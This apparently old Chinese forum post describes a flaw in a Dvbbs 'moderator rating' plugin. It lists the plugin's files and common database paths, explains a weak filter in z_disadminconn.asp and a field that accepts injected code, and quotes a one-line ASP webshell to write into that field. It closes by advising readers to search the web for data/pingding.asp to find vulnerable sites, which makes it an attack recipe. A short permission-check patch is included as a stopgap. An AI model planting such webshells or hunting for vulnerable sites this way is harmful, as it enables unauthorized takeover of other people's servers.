就是關(guān)于“斑主評(píng)定”欄目，當(dāng)然是插件。
插件比較亂，有很多，比如前臺(tái)就是
z_disadmin.asp
z_disadmin_edit.asp
z_disadminconn.asp
后臺(tái)在data/#pingding.mdb
有的后臺(tái)在data/pingding.asp
有的則在data/disadmin_db.asp
另外有的后臺(tái)會(huì)這樣Data_plus/something的！
當(dāng)然可以暴庫(kù)，關(guān)鍵就是z_disadminconn.asp過(guò)濾不嚴(yán)，但是必須要找到它的所在，而且要二級(jí)。
利用的方法：
--------------------------------
關(guān)于mdb作數(shù)據(jù)庫(kù)的，那當(dāng)然沒(méi)什么危險(xiǎn)，這個(gè)漏洞也只能算是個(gè)雞肋。
但是對(duì)于asp作數(shù)據(jù)庫(kù)的，卻有利用的方法。
這都是因?yàn)閑dit中一個(gè)update的錯(cuò)誤，大部分字段都是整型的，因?yàn)閿?shù)據(jù)庫(kù)的規(guī)定
而有一個(gè)字段是可以寫(xiě)入木馬的。
雖然長(zhǎng)度有限制，但是夠?qū)懸粋€(gè)微型木馬了，我用<%execute request("allyesno")%>
對(duì)于暫時(shí)的防范，可以在edit中加入一個(gè)過(guò)濾參數(shù):
-----------codz begin----------------
Head()
dim admin_flag,isEdit,boname,msgtitle,msginfo,SubRs
admin_flag="22"
if not Dvbbs.master or instr(session("flag"),admin_flag)=0 then
Errmsg=ErrMsg + "<BR><li>本頁(yè)面為管理員專(zhuān)用，請(qǐng)<a href=admin_index.asp target=_top>
登陸</a>后進(jìn)入。<br><li>您沒(méi)有管理本頁(yè)面的權(quán)限。"
dvbbs_error()
end if
-------------codz end---------------
總而言之，只能說(shuō)明開(kāi)發(fā)插件的人頭腦有問(wèn)題。
雖然利用不大，擴(kuò)散不廣。但是還是有得玩的！
具體攻擊：
應(yīng)該是搜索data/pingding.asp。一般這個(gè)數(shù)據(jù)庫(kù)沒(méi)人改的。